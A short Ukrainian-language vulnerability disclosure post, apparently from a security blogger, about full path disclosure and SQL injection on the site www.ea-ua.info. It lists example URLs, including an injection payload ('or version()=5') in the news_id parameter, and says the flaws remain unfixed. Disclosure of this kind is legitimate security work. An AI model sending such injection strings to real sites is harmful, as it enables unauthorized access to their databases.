Уразливості на www.ea-ua.info
16:14 20.10.201004.02.2010
У червні, 28.06.2009, я знайшов Full path disclosure та SQL Injection уразливості на проекті http://www.ea-ua.info. Про що найближчим часом сповіщу адміністрацію проекту.
Детальна інформація про уразливості з’явиться пізніше.
20.10.2010
Full path disclosure:
http://www.ea-ua.info/main.php?parts_id=-1&news_id=1
http://www.ea-ua.info/main.php?parts_id=1&news_id=-1
SQL Injection:
http://www.ea-ua.info/main.php?parts_id=6&news_id=-1%20or%20version()=5&news_show_type=1
Дані уразливості досі не виправлені.